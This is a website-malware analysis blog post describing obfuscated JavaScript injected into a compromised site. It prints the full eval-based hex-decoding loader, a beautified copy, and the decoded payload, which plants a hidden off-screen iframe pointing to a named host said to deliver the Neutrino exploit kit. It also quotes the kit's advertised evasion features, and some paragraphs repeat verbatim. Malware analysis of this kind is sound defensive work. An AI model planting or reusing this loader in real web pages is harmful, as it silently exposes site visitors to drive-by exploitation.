Malicious JavaScript injects hidden iframe leading to Neutrino exploit
Background
Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor.
Hidden malicious iframe redirects browser to URL hosting Neutrino exploit. This exploit kit is relatively new and targets at least two Java vulnerabilities CVE-2013-0431 and CVE-2012-1723. The snapshots of the advertising can be seen in malware don't need Coffee post.
Just some of the features this service offers:
1. Plugin's detector
2. On-going check vs major AV vendors to avoid detection of the main code parts
3. User friendly control panel allows Flow Control, Rotation managing, Exploit selection and e.t.c...
4. Transferring the .exe to the client in the encrypted form.
This particular infected website hosts suspicious JavaScript code injected in 2 files and the breakdown of the detection is provided below.
Hidden malicious iframe redirects browser to URL hosting Neutrino exploit. This exploit kit is relatively new and targets at least two Java vulnerabilities CVE-2013-0431 and CVE-2012-1723. The snapshots of the advertising can be seen in malware don't need Coffee post.
Just some of the features this service offers:
1. Plugin's detector
2. On-going check vs major AV vendors to avoid detection of the main code parts
3. User friendly control panel allows Flow Control, Rotation managing, Exploit selection and e.t.c...
4. Transferring the .exe to the client in the encrypted form.
This particular infected website hosts suspicious JavaScript code injected in 2 files and the breakdown of the detection is provided below.
Malicious action
Malicious iframes are often used to distribute malware hosted on external web resources(websites).
Website malware scanner report
Submission date: Sun May 12 11:59:41 2013
Infected website's files: 2
Quttera | Website Security Scan report |
Sitescan report | malicious JavaScript in 2 web pages |
Threat dump: [[<script type='text/javascript' language='javascript' >
e=eval;
v="0"+"x";
a=0;
z="y";
try
{
a*=2
}
catch(q)
{
a=1
}
if(!a)
{
try
{
document["\x62od"+z]++
}
catch(q)
{
a2="_"
}
z="10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10_10_70_6d_79_68_74_6c_79_2f_30_42_14_10_10_84_27_6c_73_7a_6c_27_82_14_10_10_10_6b_76_6a_7c_74_6c_75_7b_35_7e_79_70_7b_6c_2f_29_43_70_6d_79_68_74_6c_27_7a_79_6a_44_2e_6f_7b_7b_77_41_36_36_79_7c_73_73_6c_79_7a_7b_7c_69_6c_7a_35_75_6c_7b_36_73_70_69_80_6b_70_71_6a_7d_71_6c_46_6d_6a_69_72_6f_74_6b_6c_7b_7e_7f_7c_44_3c_38_3f_3d_3e_3c_38_2e_27_7e_70_6b_7b_6f_44_2e_38_37_37_2e_27_6f_6c_70_6e_6f_7b_44_2e_38_37_37_2e_27_7a_7b_80_73_6c_44_2e_7e_70_6b_7b_6f_41_38_37_37_77_7f_42_6f_6c_70_6e_6f_7b_41_38_37_37_77_7f_42_77_76_7a_70_7b_70_76_75_41_68_69_7a_76_73_7c_7b_6c_42_73_6c_6d_7b_41_34_38_37_37_37_37_77_7f_42_7b_76_77_41_37_42_2e_45_43_36_70_6d_79_68_74_6c_45_29_30_42_14_10_10_84_14_10_10_6d_7c_75_6a_7b_70_76_75_27_70_6d_79_68_74_6c_79_2f_30_82_14_10_10_10_7d_68_79_27_6d_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_7a_79_6a_2e_33_2e_6f_7b_7b_77_41_36_36_79_7c_73_73_6c_79_7a_7b_7c_69_6c_7a_35_75_6c_7b_36_73_70_69_80_6b_70_71_6a_7d_71_6c_46_6d_6a_69_72_6f_74_6b_6c_7b_7e_7f_7c_44_3c_38_3f_3d_3e_3c_38_2e_30_42_6d_35_7a_7b_80_73_6c_35_73_6c_6d_7b_44_2e_34_38_37_37_37_37_77_7f_2e_42_6d_35_7a_7b_80_73_6c_35_7b_76_77_44_2e_37_2e_42_6d_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_44_2e_68_69_7a_76_73_7c_7b_6c_2e_42_6d_35_7a_7b_80_73_6c_35_7b_76_77_44_2e_37_2e_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_7e_70_6b_7b_6f_2e_33_2e_38_37_37_2e_30_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_6f_6c_70_6e_6f_7b_2e_33_2e_38_37_37_2e_30_42_14_10_10_10_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_6d_30_42_14_10_10_84"["split"](a2);
za="";
for(i=0;
i<z.length;
i++)
{
za+=String["fromCharCode"](e(v+(z[i]))-4-3);
}
zaz=za;
e(zaz);
}
</script>]]
Malware entry
Malware entry details.
Beautified script
- e = eval;
- v = "0" + "x";
- a = 0;
- z = "y";
- try {
- a *= 2
- } catch (q) {
- a = 1
- }
- if (!a) {
- try {
- document["\x62od" + z]++
- } catch (q) {
- a2 = "_"
- }
- z ="10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10_10_70_6d_79_68_74_6c_79_2f_30_42_14_10_10_84_27_6c_73_7a_6c_27_82_14_10_10_10_6b_76_6a_7c_74_6c_75_7b_35_7e_79_70_7b_6c_2f_29_43_70_6d_79_68_74_6c_27_7a_79_6a_44_2e_6f_7b_7b_77_41_36_36_79_7c_73_73_6c_79_7a_7b_7c_69_6c_7a_35_75_6c_7b_36_73_70_69_80_6b_70_71_6a_7d_71_6c_46_6d_6a_69_72_6f_74_6b_6c_7b_7e_7f_7c_44_3c_38_3f_3d_3e_3c_38_2e_27_7e_70_6b_7b_6f_44_2e_38_37_37_2e_27_6f_6c_70_6e_6f_7b_44_2e_38_37_37_2e_27_7a_7b_80_73_6c_44_2e_7e_70_6b_7b_6f_41_38_37_37_77_7f_42_6f_6c_70_6e_6f_7b_41_38_37_37_77_7f_42_77_76_7a_70_7b_70_76_75_41_68_69_7a_76_73_7c_7b_6c_42_73_6c_6d_7b_41_34_38_37_37_37_37_77_7f_42_7b_76_77_41_37_42_2e_45_43_36_70_6d_79_68_74_6c_45_29_30_42_14_10_10_84_14_10_10_6d_7c_75_6a_7b_70_76_75_27_70_6d_79_68_74_6c_79_2f_30_82_14_10_10_10_7d_68_79_27_6d_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_7a_79_6a_2e_33_2e_6f_7b_7b_77_41_36_36_79_7c_73_73_6c_79_7a_7b_7c_69_6c_7a_35_75_6c_7b_36_73_70_69_80_6b_70_71_6a_7d_71_6c_46_6d_6a_69_72_6f_74_6b_6c_7b_7e_7f_7c_44_3c_38_3f_3d_3e_3c_38_2e_30_42_6d_35_7a_7b_80_73_6c_35_73_6c_6d_7b_44_2e_34_38_37_37_37_37_77_7f_2e_42_6d_35_7a_7b_80_73_6c_35_7b_76_77_44_2e_37_2e_42_6d_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_44_2e_68_69_7a_76_73_7c_7b_6c_2e_42_6d_35_7a_7b_80_73_6c_35_7b_76_77_44_2e_37_2e_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_7e_70_6b_7b_6f_2e_33_2e_38_37_37_2e_30_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_6f_6c_70_6e_6f_7b_2e_33_2e_38_37_37_2e_30_42_14_10_10_10_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_6d_30_42_14_10_10_84"["split"](a2);
- za = "";
- for (i = 0; i < z.length; i++) {
- za += String["fromCharCode"](e(v + (z[i])) - 4 - 3);
- }
- zaz = za;
- e(zaz);
Malicious payload
Decoded payload injects hidden iframe to http://rullerstubes.net/libydijcvje?fcbkhmdetwxu=5186751 which leads to Neutrino exploit
- if (document.getElementsByTagName('body')[0]) {
- iframer();
- } else {
- document.write("<iframe src='http://rullerstubes.net/libydijcvje?fcbkhmdetwxu=5186751' width='100' height='100' style='width:100px;height:100px;position:absolute;left:-10000px;top:0;'></iframe>");
- }
- function iframer() {
- var f = document.createElement('iframe');
- f.setAttribute('src', 'http://rullerstubes.net/libydijcvje?fcbkhmdetwxu=5186751');
- f.style.left = '-10000px';
- f.style.top = '0';
- f.style.position = 'absolute';
- f.style.top = '0';
- f.setAttribute('width', '100');
- f.setAttribute('height', '100');
- document.getElementsByTagName('body')[0].appendChild(f);
- }
Blacklisting status
The website is Suspicious on Google Safe Browsing.
Malware clean-up
Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.
No comments:
Post a Comment